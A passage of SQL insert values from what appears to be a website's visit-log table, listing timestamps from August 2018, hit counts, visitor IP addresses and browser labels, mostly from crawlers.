281606,1533272121,1,1,0,0,'95.163.255.97','other'),(281607,1533272307,1,1,0,0,'54.36.148.16','other'),(281608,1533272379,1,1,0,0,'54.36.149.27','other'),(281609,1533272797,1,1,0,0,'54.36.148.126','other'),(281610,1533272807,1,1,0,0,'54.36.148.122','other'),(281611,1533272842,1,1,0,0,'54.36.148.203','other'),(281612,1533273130,1,1,0,0,'54.36.148.114','other'),(281613,1533273182,1,1,0,0,'54.36.148.86','other'),(281614,1533273222,1,1,0,0,'54.36.149.96','other'),(281615,1533273269,1,1,0,0,'13.66.205.121','other'),(281616,1533273358,1,1,0,0,'216.244.66.241','other'),(281617,1533273786,1,1,0,0,'54.36.148.65','other'),(281618,1533273848,1,1,0,0,'54.36.149.37','other'),(281619,1533273879,1,1,0,0,'54.36.148.85','other'),(281620,1533273902,1,1,0,0,'54.36.148.165','other'),(281621,1533274245,1,1,0,0,'95.163.255.153','other'),(281622,1533274341,1,1,0,0,'54.36.148.141','other'),(281623,1533274483,1,1,0,0,'54.36.148.71','other'),(281624,1533274507,1,1,0,0,'54.36.149.34','other'),(281625,1533274909,1,1,0,0,'54.36.148.95','other'),(281626,1533275120,1,1,0,0,'54.36.148.32','other'),(281627,1533275137,2,2,0,0,'91.196.178.169','chrome'),(281628,1533275197,1,1,0,0,'66.102.9.38','chrome'),(281629,1533275219,1,1,0,0,'54.36.148.94','other'),(281630,1533275226,1,1,0,0,'54.36.148.65','other'),(281631,1533275713,1,1,0,0,'54.36.148.62','other'),(281632,1533275724,1,1,0,0,'51.255.65.46','other'),(281633,1533275730,1,1,0,0,'54.36.148.222','other'),(281634,1533275930,1,1,0,0,'54.36.148.128','other'),(281635,1533275982,1,1,0,0,'54.36.149.81','other'),(281636,1533276335,1,1,0,0,'54.36.148.150','other'),(281637,1533276338,1,1,0,0,'207.46.13.36','other'),(281638,1533276602,1,1,0,0,'54.36.148.140','other'),(281639,1533276610,1,1,0,0,'54.36.148.241','other'),(281640,1533276710,1,1,0,0,'54.36.149.27','other'),(281641,1533276824,1,1,0,0,'54.36.148.164','other'),(281642,1533277724,1,1,0,0,'207.46.13.39','other'),(281643,1533277768,1,1,0,0,'8.29.198.26','other'),(281644,1533277955,1,1,0,0,'54.36.149.66','other'),(281645,1533278100,2,2,0,0,'54.36.148.52','other'),(281646,1533278281,1,1,0,0,'54.36.149.30','other'),(281647,1533278321,1,1,0,0,'54.36.148.98','other'),(281648,1533278454,1,1,0,0,'91.196.178.80','chrome'),(281649,1533278469,1,1,0,0,'54.36.148.68','other'),(281650,1533278721,1,1,0,0,'54.36.148.103','other'),(281651,1533278734,1,1,0,0,'54.36.148.17','other'),(281652,1533279156,1,1,0,0,'54.36.149.49','other'),(281653,1533279169,2,2,0,0,'178.93.234.146','chrome'),(281654,1533279372,1,1,0,0,'54.36.149.86','other'),(281655,1533279388,1,1,0,0,'8.29.198.26','other'),(281656,1533279434,1,1,0,0,'54.36.148.56','other'),(281657,1533279834,1,0,1,0,'66.249.66.157',''),(281658,1533279936,1,1,0,0,'66.249.66.155','chrome'),(281659,1533279946,1,1,0,0,'54.36.148.158','other'),(281660,1533280008,1,1,0,0,'54.36.148.182','other'),(281661,1533280356,1,1,0,0,'207.46.13.36','other'),(281662,1533280401,1,1,0,0,'95.163.255.187','other'),(281663,1533280412,1,1,0,0,'54.36.149.43','other'),(281664,1533280451,1,1,0,0,'178.154.171.81','other'),(281665,1533280545,1,1,0,0,'91.196.177.15','chrome'),(281666,1533280546,1,1,0,0,'31.41.89.209','chrome'),(281667,1533280622,3,3,0,0,'216.244.66.241','other'),(281668,1533280737,1,1,0,0,'13.66.205.121','other'),(281669,1533280818,1,1,0,0,'54.36.149.6','other'),(281670,1533280946,1,1,0,0,'54.36.148.70','other'),(281671,1533280978,1,1,0,0,'54.36.148.157','other'),(281672,1533281105,1,1,0,0,'54.36.148.124','other'),(281673,1533281210,1,1,0,0,'54.36.148.196','other'),(281674,1533281404,1,1,0,0,'54.36.148.131','other'),(281675,1533282026,1,1,0,0,'54.36.149.87','other'),(281676,1533282208,1,1,0,0,'94.178.0.13','chrome'),(281677,1533282328,1,1,0,0,'195.66.156.46','chrome'),(281678,1533282438,1,1,0,0,'54.36.148.194','other'),(281679,1533282724,1,1,0,0,'54.36.148.145','other'),(281680,1533282936,1,1,0,0,'54.36.148.204','other'),(281681,1533283079,1,1,0,0,'54.36.148.76','other'),(281682,1533283118,1,1,0,0,'54.36.148.241','other'),(281683,1533283198,1,1,0,0,'54.36.148.181','other'),(281684,1533283366,1,1,0,0,'54.36.148.50','other'),(281685,1533283403,1,1,0,0,'95.163.255.97','other'),(281686,1533283409,1,1,0,0,'54.36.148.202','other'),(281687,1533283411,1,1,0,0,'216.244.66.241','other'),(281688,1533283426,1,1,0,0,'54.36.148.188','other'),(281689,1533283460,1,1,0,0,'54.36.149.105','other'),(281690,1533283481,1,1,0,0,'185.41.23.122','chrome'),(281691,1533283492,1,1,0,0,'91.196.178.169','chrome'),(281692,1533283548,1,1,0,0,'54.36.149.50','other'),(281693,1533283674,1,1,0,0,'54.36.148.124','other'),(281694,1533283816,1,1,0,0,'54.36.148.43','other'),(281695,1533283916,1,1,0,0,'195.211.62.153','firefox'),(281696,1533284225,1,1,0,0,'54.36.148.114','other'),(281697,1533284232,1,1,0,0,'54.36.148.84','other'),(281698,1533284438,1,1,0,0,'54.36.148.96','other'),(281699,1533284627,1,1,0,0,'54.36.148.127','other'),(281700,1533285091,1,1,0,0,'66.102.9.40','chrome'),(281701,1533285095,1,1,0,0,'66.102.9.38','chrome'),(281702,1533285164,1,1,0,0,'54.36.148.53','other'),(281703,1533285178,1,1,0,0,'54.36.149.52','other'),(281704,1533285222,1,1,0,0,'54.36.149.92','other'),(281705,1533285289,2,2,0,0,'91.196.178.102','chrome'),(281706,1533285372,3,3,0,0,'91.196.178.187','chrome'),(281707,1533285602,1,1,0,0,'54.36.148.87','other'),(281708,1533285629,1,1,0,0,'54.36.149.15','other'),(281709,1533285723,2,2,0,0,'216.244.66.241','other'),(281710,1533285863,1,1,0,0,'54.36.149.46','other'),(281711,1533285963,1,1,0,0,'54.36.148.220','other'),(281712,1533286619,1,1,0,0,'54.36.149.76','other'),(281713,1533287039,1,1,0,0,'54.36.148.249','other'),(281714,1533287050,1,1,0,0,'54.36.148.203','other'),(281715,1533287483,1,1,0,0,'54.36.148.204','other'),(281716,1533288077,1,1,0,0,'54.36.148.188','other'),(281717,1533288206,1,1,0,0,'54.36.149.58','other'),(281718,1533288311,1,1,0,0,'207.46.13.38','other'),(281719,1533288326,1,1,0,0,'54.36.148.151','other'),(281720,1533288347,1,1,0,0,'54.36.148.131','other'),(281721,1533288355,1,1,0,0,'54.36.148.146','other'),(281722,1533288456,1,1,0,0,'54.36.148.98','other'),(281723,1533288531,1,1,0,0,'54.36.148.235','other'),(281724,1533288603,1,1,0,0,'95.163.255.92','other'),(281725,1533288646,1,1,0,0,'54.36.148.108','other'),(281726,1533288651,1,1,0,0,'8.29.198.25','other'),(281727,1533288739,1,1,0,0,'216.244.66.241','other'),(281728,1533288944,1,1,0,0,'91.196.177.134','chrome'),(281729,1533288971,1,1,0,0,'54.36.149.94','other'),(281730,1533289833,1,1,0,0,'54.36.148.117','other'),(281731,1533289849,1,0,1,0,'66.249.66.156',''),(281732,1533289899,1,1,0,0,'66.249.66.156','chrome'),(281733,1533290242,1,1,0,0,'8.29.198.27','other'),(281734,1533290476,1,1,0,0,'82.207.49.146','chrome'),(281735,1533290530,1,1,0,0,'54.36.148.202','other'),(281736,1533290758,1,1,0,0,'54.36.148.246','other'),(281737,1533290793,3,3,0,0,'216.244.66.241','other'),(281738,1533290851,1,1,0,0,'54.36.148.245','other'),(281739,1533291078,1,1,0,0,'109.68.43.102','chrome'),(281740,1533291103,1,1,0,0,'54.36.148.146','other'),(281741,1533291113,1,1,0,0,'54.36.149.47','other'),(281742,1533291129,1,1,0,0,'54.36.148.233','other'),(281743,1533291175,1,1,0,0,'54.36.148.163','other'),(281744,1533291252,1,1,0,0,'54.36.148.197','other'),(281745,1533291755,1,1,0,0,'54.36.148.173','other'),(281746,1533291759,1,1,0,0,'40.77.167.20','other'),(281747,1533292044,1,1,0,0,'54.36.148.31','other'),(281748,1533292078,1,0,1,0,'66.249.66.155',''),(281749,1533292172,1,1,0,0,'54.36.148.83','other'),(281750,1533292240,1,1,0,0,'54.36.148.78','other'),(281751,1533292377,1,1,0,0,'54.36.148.32','other'),(281752,1533292488,1,1,0,0,'54.36.148.164','other'),(281753,1533292499,1,1,0,0,'54.36.149.51','other'),(281754,1533292573,1,1,0,0,'46.211.134.19','chrome'),(281755,1533292580,1,1,0,0,'54.36.148.77','other'),(281756,1533292959,1,0,1,0,'66.249.66.156',''),(281757,1533293092,1,1,0,0,'54.36.148.165','other'),(281758,1533293138,1,1,0,0,'54.36.148.34','other'),(281759,1533293182,1,1,0,0,'54.36.148.236','other'),(281760,1533293417,1,1,0,0,'54.36.149.36','other'),(281761,1533293458,1,1,0,0,'54.36.149.32','other'),(281762,1533293618,1,1,0,0,'54.36.148.49','other'),(281763,1533293752,1,1,0,0,'141.8.132.22','other'),(281764,1533293972,1,1,0,0,'54.36.149.22','other'),(281765,1533294075,1,1,0,0,'212.87.168.109','chrome'),(281766,1533294322,1,1,0,0,'54.36.148.126','other'),(281767,1533294518,1,1,0,0,'51.255.65.46','other'),(281768,1533294606,1,1,0,0,'54.36.149.14','other'),(281769,1533294701,1,1,0,0,'54.36.149.73','other'),(281770,1533294834,1,1,0,0,'54.36.148.156','other'),(281771,1533295251,1,1,0,0,'91.196.178.80','chrome'),(281772,1533295305,1,1,0,0,'54.36.148.155','other'),(281773,1533295726,1,1,0,0,'95.163.255.192','other'),(281774,1533295845,1,1,0,0,'54.36.148.247','other'),(281775,1533295867,1,1,0,0,'54.36.148.22','other'),(281776,1533296005,1,1,0,0,'216.244.66.241','other'),(281777,1533296206,1,1,0,0,'54.36.149.7','other'),(281778,1533296575,1,1,0,0,'54.36.149.63','other'),(281779,1533296999,1,1,0,0,'54.36.148.183','other'),(281780,1533297123,1,0,1,0,'66.249.66.157',''),(281781,1533297295,1,1,0,0,'207.46.13.39','other'),(281782,1533297334,1,1,0,0,'54.36.148.236','other'),(281783,1533297336,1,1,0,0,'91.196.178.169','chrome'),(281784,1533297358,1,1,0,0,'54.36.149.87','other'),(281785,1533297366,1,1,0,0,'93.73.225.149','firefox'),(281786,1533297607,1,1,0,0,'54.36.148.68','other'),(281787,1533297929,1,1,0,0,'37.53.201.177','chrome'),(281788,1533298135,1,1,0,0,'54.36.148.126','other'),(281789,1533298199,1,1,0,0,'54.36.148.255','other'),(281790,1533298383,1,1,0,0,'5.45.207.58','other'),(281791,1533298391,1,1,0,0,'54.36.148.100','other'),(281792,1533298475,1,1,0,0,'5.45.207.83','other'),(281793,1533298497,1,1,0,0,'54.36.148.98','other'),(281794,1533298512,1,1,0,0,'54.36.149.48','other'),(281795,1533298532,1,1,0,0,'54.36.148.50','other'),(281796,1533298853,1,0,1,0,'66.249.66.156',''),(281797,1533298934,2,1,1,0,'66.249.66.155',''),(281798,1533299331,1,1,0,0,'54.36.149.53','other'),(281799,1533299379,1,1,0,0,'54.36.149.16','other'),(281800,1533299523,1,1,0,0,'8.29.198.26','other'),(281801,1533299713,1,1,0,0,'91.196.178.99','chrome'),(281802,1533299863,1,1,0,0,'54.36.149.9','other'),(281803,1533300004,1,1,0,0,'207.46.13.39','other'),(281804,1533300129,1,1,0,0,'54.36.148.205','other'),(281805,1533300156,1,1,0,0,'180.76.15.151','other'),(281806,1533300247,1,1,0,0,'54.36.149.28','other'),(281807,1533300413,1,1,0,0,'54.36.149.25','other'),(281808,1533300495,1,0,1,0,'66.249.66.155',''),(281809,1533300524,1,0,1,0,'66.249.66.156',''),(281810,1533300526,1,1,0,0,'54.36.149.85','other'),(281811,1533300910,1,1,0,0,'134.249.50.5','chrome'),(281812,1533300997,1,1,0,0,'92.113.174.166','chrome'),(281813,1533301100,1,1,0,0,'54.36.148.248','other'),(281814,1533301110,1,1,0,0,'8.29.198.26','other'),(281815,1533301159,1,1,0,0,'216.244.66.241','other'),(281816,1533301403,1,1,0,0,'54.36.148.99','other'),(281817,1533301415,1,1,0,0,'178.154.171.10','other'),(281818,1533301536,1,1,0,0,'54.36.148.245','other'),(281819,1533301674,1,1,0,0,'54.36.148.237','other'),(281820,1533301696,1,1,0,0,'54.36.148.166','other'),(281821,1533302133,1,1,0,0,'185.220.101.33','other'),(281822,1533302416,1,1,0,0,'54.36.149.9','other'),(281823,1533302711,1,1,0,0,'54.36.148.52','other'),(281824,1533303034,1,1,0,0,'54.36.148.25','other'),(281825,1533303680,1,1,0,0,'54.36.149.105','other'),(281826,1533304078,1,1,0,0,'91.196.178.179','chrome'),(281827,1533304156,1,1,0,0,'66.249.66.156','chrome'),(281828,1533304449,1,1,0,0,'54.36.148.239','other'),(281829,1533304468,1,1,0,0,'54.36.148.238','other'),(281830,1533304986,1,1,0,0,'54.36.148.150','other'),(281831,1533305006,1,1,0,0,'54.36.148.96','other'),(281832,1533305087,1,1,0,0,'54.36.148.148','other'),(281833,1533305141,1,1,0,0,'54.36.149.98','other'),(281834,1533305221,1,1,0,0,'54.36.148.143','other'),(281835,1533305275,1,1,0,0,'54.36.148.220','other'),(281836,1533305361,1,1,0,0,'54.36.148.123','other'),(281837,1533305570,1,1,0,0,'54.36.148.103','other'),(281838,1533305685,1,1,0,0,'54.36.148.124','other'),(281839,1533305753,1,1,0,0,'51.15.34.214','other'),(281840,1533305871,1,1,0,0,'54.36.148.22','other'),(281841,1533306322,1,1,0,0,'54.36.148.209','other'),(281842,1533306341,1,1,0,0,'54.36.149.67','other'),(281843,1533306386,1,1,0,0,'54.36.148.228','other'),(281844,1533306427,1,1,0,0,'157.55.39.210','other'),(281845,1533306542,1,1,0,0,'91.196.178.77','firefox'),(281846,1533306546,1,1,0,0,'216.244.66.241','other'),(281847,1533306621,8,8,0,0,'94.130.9.183','other'),(281848,1533306914,1,1,0,0,'54.36.149.96','other'),(281849,1533306930,1,1,0,0,'54.36.148.205','other'),(281850,1533307109,1,1,0,0,'54.36.149.90','other'),(281851,1533307250,1,1,0,0,'54.36.148.30','other'),(281852,1533307281,1,1,0,0,'54.36.148.98','other'),(281853,1533307527,8,8,0,0,'94.130.9.183','other'),(281854,1533307531,1,1,0,0,'54.36.149.92','other'),(281855,1533307609,1,1,0,0,'54.36.148.160','other'),(281857,1533307664,1,1,0,0,'54.36.149.33','other'),(281858,1533307901,1,1,0,0,'54.36.148.13','other'),(281859,1533307906,1,0,1,0,'66.249.66.157',''),(281860,1533308077,1,0,1,0,'66.249.66.155',''),(281861,1533308434,8,8,0,0,'94.130.9.183','other'),(281862,1533308545,1,1,0,0,'54.36.149.100','other'),(281863,1533308705,1,1,0,0,'54.36.148.17','other'),(281864,1533308794,1,1,0,0,'95.163.255.153','other'),(281865,1533308827,1,1,0,0,'54.36.148.23','other'),(281866,1533308846,1,1,0,0,'95.163.255.150','other'),(281867,1533308857,1,1,0,0,'188.230.43.254','other'),(281868,1533308865,1,1,0,0,'216.244.66.241','other'),(281869,1533308868,1,1,0,0,'54.36.149.102','other'),(281870,1533309089,1,1,0,0,'54.36.149.8','other'),(281871,1533309112,1,1,0,0,'54.36.148.130','other'),(281872,1533309197,1,1,0,0,'54.36.148.56','other'),(281873,1533309254,1,1,0,0,'54.36.149.39','other'),(281874,1533309336,6,6,0,0,'94.130.9.183','other'),(281875,1533309352,1,1,0,0,'46.20.35.114','other'),(281876,1533309360,2,2,0,0,'54.36.148.146','other'),(281877,1533309606,1,1,0,0,'54.36.148.97','other'),(281878,1533309736,1,1,0,0,'54.36.149.73','other'),(281879,1533309738,1,1,0,0,'54.36.149.64','other'),(281880,1533309859,1,1,0,0,'54.36.148.72','other'),(281881,1533310038,1,1,0,0,'54.36.148.209','other'),(281882,1533310374,1,1,0,0,'8.29.198.26','other'),(281883,1533310418,1,1,0,0,'54.36.148.128','other'),(281884,1533310570,1,1,0,0,'54.36.148.78','other'),(281885,1533310672,3,0,3,0,'66.249.66.156',''),(281886,1533310784,1,1,0,0,'54.36.149.54','other'),(281887,1533310856,1,1,0,0,'54.36.148.51','other'),(281888,1533311262,1,1,0,0,'188.230.43.254','other'),(281889,1533311526,1,1,0,0,'54.36.148.239','other'),(281890,1533311637,1,1,0,0,'66.249.66.155','chrome'),(281891,1533311961,1,1,0,0,'8.29.198.25','other'),(281892,1533312043,1,1,0,0,'54.36.149.50','other'),(281893,1533312063,1,1,0,0,'178.154.171.88','other'),(281894,1533312179,1,1,0,0,'37.9.113.134','other'),(281895,1533312403,1,1,0,0,'54.36.148.12','other'),(281896,1533312481,1,1,0,0,'54.36.149.67','other'),(281897,1533312484,1,1,0,0,'54.36.148.157','other'),(281898,1533312770,1,1,0,0,'54.36.148.222','other'),(281899,1533312942,1,1,0,0,'185.100.87.207','other'),(281900,1533312944,1,1,0,0,'54.36.148.193','other'),(281901,1533312947,1,1,0,0,'54.36.149.39','other'),(281902,1533312974,1,1,0,0,'54.36.148.192','other'),(281903,1533313083,1,1,0,0,'54.36.148.55','other'),(281904,1533313659,1,1,0,0,'188.230.43.254','other'),(281905,1533313770,1,1,0,0,'141.8.142.74','other'),(281906,1533314105,1,1,0,0,'54.36.149.14','other'),(281907,1533314305,1,1,0,0,'54.36.149.39','other'),(281908,1533314448,1,1,0,0,'52.53.201.78','chrome'),(281909,1533314691,1,1,0,0,'54.36.148.185','other'),(281910,1533314875,1,1,0,0,'92.113.189.235','chrome'),(281911,1533315133,1,1,0,0,'54.36.149.57','other'),(281912,1533315339,1,1,0,0,'54.36.149.106','other'),(281913,1533315478,1,1,0,0,'54.36.148.235','other'),(281914,1533316007,1,1,0,0,'54.36.149.86','other'),(281915,1533316126,1,1,0,0,'141.8.142.74','other'),(281916,1533316313,1,1,0,0,'54.36.149.98','other'),(281917,1533316404,1,1,0,0,'95.163.255.92','other'),(281918,1533316453,2,2,0,0,'216.244.66.241','other'),(281919,1533316456,1,1,0,0,'54.36.148.149','other'),(281920,1533316469,1,1,0,0,'54.36.148.126','other'),(281921,1533316504,1,1,0,0,'54.36.148.127','other'),(281922,1533316540,1,1,0,0,'51.15.15.79','other'),(281923,1533316702,1,0,1,0,'66.249.66.155',''),(281924,1533316706,1,1,0,0,'54.36.149.13','other'),(281925,1533316709,1,1,0,0,'54.36.148.60','other'),(281926,1533316713,1,1,0,0,'54.36.148.48','other'),(281927,1533316905,1,1,0,0,'54.36.148.153','other'),(281928,1533316924,1,1,0,0,'194.187.170.145','other'),(281929,1533316935,1,1,0,0,'54.36.148.120','other'),(281930,1533317006,1,1,0,0,'157.55.39.210','other'),(281931,1533317194,1,1,0,0,'54.36.148.147','other'),(281932,1533317202,1,1,0,0,'66.249.66.156','chrome'),(281933,1533317432,2,2,0,0,'91.196.178.133','chrome'),(281934,1533317629,1,1,0,0,'54.36.148.229','other'),(281935,1533317708,1,1,0,0,'95.132.19.134','other'),(281936,1533317869,1,1,0,0,'54.36.148.172','other'),(281937,1533317937,1,1,0,0,'54.36.149.7','other'),(281938,1533318003,1,1,0,0,'54.36.148.223','other'),(281939,1533318044,1,1,0,0,'194.187.170.145','other'),(281940,1533318053,1,1,0,0,'54.36.148.75','other'),(281941,1533318133,2,2,0,0,'54.36.148.112','other'),(281942,1533318168,1,1,0,0,'54.36.148.20','other'),(281943,1533318220,1,1,0,0,'54.36.149.37','other'),(281944,1533318349,1,1,0,0,'178.154.171.88','other'),(281945,1533318373,1,1,0,0,'54.36.148.191','other'),(281946,1533318694,1,1,0,0,'54.165.59.7','other'),(281947,1533318747,1,1,0,0,'54.36.149.2','other'),(281948,1533319040,2,2,0,0,'216.244.66.241','other'),(281949,1533319355,1,1,0,0,'54.36.148.214','other'),(281950,1533319823,1,1,0,0,'54.36.148.221','other'),(281951,1533320157,1,1,0,0,'185.220.101.5','other'),(281952,1533320172,1,1,0,0,'54.36.149.60','other'),(281953,1533320195,1,1,0,0,'54.36.149.15','other'),(281954,1533320302,1,1,0,0,'54.36.149.24','other'),(281955,1533320303,1,1,0,0,'54.36.148.208','other'),(281956,1533320451,1,1,0,0,'54.36.148.216','other'),(281957,1533320622,1,1,0,0,'54.36.148.218','other'),(281958,1533320873,1,1,0,0,'54.36.148.103','other'),(281959,1533321242,1,1,0,0,'8.29.198.26','other'),(281960,1533321545,1,1,0,0,'95.163.255.96','other'),(281961,1533321627,2,2,0,0,'216.244.66.241','other'),(281962,1533321671,1,1,0,0,'54.36.148.238','other'),(281963,1533321721,1,1,0,0,'178.154.171.88','other'),(281964,1533321733,1,1,0,0,'54.36.148.41','other'),(281965,1533322169,1,1,0,0,'54.36.148.204','other'),(281966,1533322235,1,1,0,0,'82.145.208.145','other'),(281967,1533322561,1,1,0,0,'54.36.148.21','other'),(281968,1533322682,1,1,0,0,'54.36.148.158','other'),(281969,1533322821,1,1,0,0,'8.29.198.25','other'),(281970,1533322917,1,1,0,0,'54.36.148.208','other'),(281971,1533323068,1,1,0,0,'54.36.149.58','other'),(281972,1533323180,10,10,0,0,'186.233.190.3','other'),(281973,1533323226,8,8,0,0,'186.233.190.3','opera'),(281974,1533323331,1,1,0,0,'95.163.255.173','other'),(281975,1533323409,1,1,0,0,'54.36.148.254','other'),(281976,1533323482,1,1,0,0,'54.36.148.240','other'),(281977,1533323510,1,0,1,0,'66.249.64.71',''),(281978,1533323522,1,1,0,0,'157.55.39.210','other'),(281979,1533323530,79,79,0,0,'50.63.162.47','other'),(281980,1533323662,1,1,0,0,'54.36.149.62','other'),(281981,1533323738,1,1,0,0,'94.16.123.176','other'),(281982,1533323754,1,1,0,0,'54.36.148.82','other'),(281983,1533323965,1,1,0,0,'54.36.149.33','other'),(281984,1533324034,1,1,0,0,'54.36.148.156','other'),(281985,1533324043,1,1,0,0,'54.36.148.45','other'),(281986,1533324167,1,1,0,0,'216.244.66.241','other'),(281987,1533324205,1,1,0,0,'95.163.255.192','other'),(281988,1533324350,1,1,0,0,'94.180.96.14','firefox'),(281989,1533324596,1,1,0,0,'54.36.148.158','other'),(281990,1533325139,1,1,0,0,'95.163.255.189','other'),(281991,1533325361,1,0,1,0,'66.249.64.67',''),(281992,1533325442,1,1,0,0,'54.36.149.74','other'),(281993,1533325531,1,1,0,0,'54.36.148.16','other'),(281994,1533325800,1,1,0,0,'54.36.149.58','other'),(281995,1533326559,1,1,0,0,'54.36.148.15','other'),(281996,1533326717,1,0,1,0,'66.249.64.67',''),(281997,1533326873,1,1,0,0,'216.244.66.241','other'),(281998,1533326904,1,1,0,0,'95.163.255.94','other'),(281999,1533326983,1,1,0,0,'54.36.148.99','other'),(282000,1533327288,1,1,0,0,'54.36.148.191','other'),(282001,1533327345,1,1,0,0,'212.16.104.33','other'),(282002,1533327509,1,1,0,0,'54.36.148.56','other'),(282003,1533327918,1,1,0,0,'54.36.148.213','other'),(282004,1533328487,1,1,0,0,'54.36.149.79','other'),(282005,1533328547,1,1,0,0,'54.36.148.82','other'),(282006,1533329029,1,1,0,0,'54.36.149.22','other'),(282007,1533329136,1,1,0,0,'54.36.149.30','other'),(282008,1533329737,1,1,0,0,'54.36.148.81','other'),(282009,1533329813,1,1,0,0,'54.36.149.67','other'),(282010,1533329909,1,1,0,0,'54.36.148.33','other'),(282011,1533329993,1,1,0,0,'54.36.149.60','other'),(282012,1533330073,1,1,0,0,'54.36.149.38','other'),(282013,1533330212,1,1,0,0,'54.36.148.220','other'),(282014,1533330442,1,1,0,0,'54.36.148.86','other'),(282015,1533330522,1,1,0,0,'54.36.149.103','other'),(282016,1533330927,1,1,0,0,'185.125.33.114','other'),(282017,1533331427,1,1,0,0,'54.36.148.255','other'),(282018,1533331429,2,2,0,0,'216.244.66.241','other'),(282019,1533332020,1,1,0,0,'54.36.149.102','other'),(282020,1533332096,1,1,0,0,'8.29.198.25','other'),(282021,1533332449,1,1,0,0,'54.36.148.118','other'),(282022,1533332549,1,1,0,0,'54.36.148.58','other'),(282023,1533332830,1,1,0,0,'54.36.148.154','other'),(282024,1533333016,1,1,0,0,'54.36.148.101','other'),(282025,1533333216,1,1,0,0,'54.36.148.167','other'),(282026,1533333421,1,1,0,0,'54.36.148.211','other'),(282027,1533333681,1,1,0,0,'8.29.198.26','other'),(282028,1533333744,1,1,0,0,'141.8.142.74','other'),(282029,1533333909,1,1,0,0,'54.36.148.77','other'),(282030,1533334174,1,1,0,0,'54.36.148.205','other'),(282031,1533334194,1,1,0,0,'216.244.66.241','other'),(282032,1533334613,1,1,0,0,'185.220.101.20','other'),(282033,1533334751,1,1,0,0,'141.8.142.74','other'),(282034,1533334872,1,1,0,0,'144.76.119.201','other'),(282035,1533334901,1,1,0,0,'95.163.255.179','other'),(282036,1533334909,1,1,0,0,'54.36.148.199','other'),(282037,1533335053,1,1,0,0,'54.36.148.97','other'),(282038,1533335055,1,1,0,0,'54.36.149.80','other'),(282039,1533335361,1,1,0,0,'54.36.149.30','other'),(282040,1533335709,1,1,0,0,'54.36.149.25','other'),(282041,1533336033,1,1,0,0,'54.36.148.32','other'),(282042,1533336117,1,1,0,0,'54.36.148.135','other'),(282043,1533336181,1,1,0,0,'54.36.149.9','other'),(282044,1533336204,1,1,0,0,'54.36.148.37','other'),(282045,1533336477,1,1,0,0,'54.36.149.47','other'),(282046,1533336692,1,1,0,0,'54.36.148.231','other'),(282047,1533336778,1,1,0,0,'207.46.13.36','other'),(282048,1533337048,1,1,0,0,'54.36.148.153','other'),(282049,1533337057,1,1,0,0,'54.36.148.141','other'),(282050,1533337073,1,1,0,0,'37.55.57.95','chrome'),(282051,1533337675,1,1,0,0,'54.36.148.165','other'),(282052,1533337676,1,1,0,0,'54.36.148.170','other'),(282053,1533337743,1,1,0,0,'54.36.148.221','other'),(282054,1533337885,1,1,0,0,'54.36.148.210','other'),(282055,1533337963,1,1,0,0,'54.36.148.215','other'),(282056,1533338045,1,1,0,0,'54.36.148.75','other'),(282057,1533338114,1,1,0,0,'54.36.148.64','other'),(282058,1533338148,1,1,0,0,'185.220.101.44','other'),(282059,1533338226,1,1,0,0,'54.36.148.183','other'),(282060,1533338322,1,1,0,0,'54.36.148.20','other'),(282061,1533338567,1,1,0,0,'37.9.113.101','other'),(282062,1533339072,1,1,0,0,'54.36.149.87','other'),(282063,1533339174,1,1,0,0,'54.36.149.103','other'),(282064,1533339433,2,2,0,0,'216.244.66.241','other'),(282065,1533339508,1,1,0,0,'54.36.148.50','other'),(282066,1533339675,1,1,0,0,'54.36.149.50','other'),(282067,1533339790,1,1,0,0,'54.36.148.73','other'),(282068,1533340189,1,1,0,0,'54.36.149.99','other'),(282069,1533340393,1,1,0,0,'54.36.148.80','other'),(282070,1533340949,1,1,0,0,'128.72.180.38','chrome'),(282071,1533341256,1,1,0,0,'54.36.148.255','other'),(282072,1533341447,1,1,0,0,'54.165.59.7','other'),(282073,1533341457,1,1,0,0,'54.36.148.96','other'),(282074,1533341459,1,1,0,0,'54.36.148.116','other'),(282075,1533341632,1,1,0,0,'54.36.148.245','other'),(282076,1533341721,1,1,0,0,'91.219.239.114','other'),(282077,1533341874,2,2,0,0,'216.244.66.241','other'),(282078,1533342558,1,1,0,0,'157.55.39.210','other'),(282079,1533342789,1,1,0,0,'54.36.149.80','other'),(282080,1533342951,1,1,0,0,'8.29.198.27','other'),(282081,1533343007,1,1,0,0,'54.36.148.198','other'),(282082,1533343068,1,1,0,0,'54.165.59.7','other'),(282083,1533343332,1,1,0,0,'178.154.171.88','other'),(282084,1533343995,1,1,0,0,'54.36.148.187','other'),(282085,1533343998,1,1,0,0,'54.36.148.190','other'),(282086,1533344044,1,1,0,0,'54.36.148.22','other'),(282087,1533344428,2,2,0,0,'216.244.66.241','other'),(282088,1533344541,1,1,0,0,'8.29.198.26','other'),(282089,1533344845,1,1,0,0,'54.36.148.141','other'),(282090,1533345341,1,1,0,0,'173.249.57.253','other'),(282091,1533345649,1,1,0,0,'54.36.148.144','other'),(282092,1533345767,1,1,0,0,'54.36.149.54','other'),(282093,1533345877,1,1,0,0,'54.36.148.183','other'),(282094,1533345949,1,1,0,0,'54.36.148.190','other'),(282095,1533346310,1,1,0,0,'54.36.149.98','other'),(282096,1533346480,1,1,0,0,'54.36.149.19','other'),(282097,1533346502,1,1,0,0,'54.36.148.12','other'),(282098,1533346570,1,1,0,0,'54.36.149.10','other'),(282099,1533346733,1,1,0,0,'52.34.24.33','chrome'),(282100,1533346901,1,1,0,0,'95.163.255.176','other'),(282101,1533347130,1,1,0,0,'54.36.148.243','other'),(282102,1533347484,1,1,0,0,'54.36.148.68','other'),(282103,1533347585,1,1,0,0,'54.36.148.38','other'),(282104,1533347652,2,2,0,0,'216.244.66.241','other'),(282105,1533347931,1,1,0,0,'54.36.148.35','other'),(282106,1533348265,1,1,0,0,'54.36.149.95','other'),(282107,1533348325,1,1,0,0,'54.165.59.7','other'),(282108,1533348562,1,1,0,0,'54.36.149.7','other'),(282109,1533348840,1,1,0,0,'54.36.149.15','other'),(282110,1533348927,1,1,0,0,'149.202.170.60','other'),(282111,1533348934,1,1,0,0,'157.55.39.210','other'),(282112,1533349076,1,1,0,0,'54.36.148.163','other'),(282113,1533349125,1,1,0,0,'54.36.148.100','other'),(282114,1533349187,1,1,0,0,'54.36.149.4','other'),(282115,1533349292,1,1,0,0,'54.36.149.38','other'),(282116,1533349341,1,1,0,0,'54.36.148.160','other'),(282117,1533349369,1,1,0,0,'54.36.148.123','other'),(282118,1533349551,1,1,0,0,'54.36.148.112','other'),(282119,1533349832,1,1,0,0,'54.36.148.33','other'),(282120,1533349940,18,18,0,0,'195.201.150.203','other'),(282121,1533350257,1,1,0,0,'54.36.148.31','other')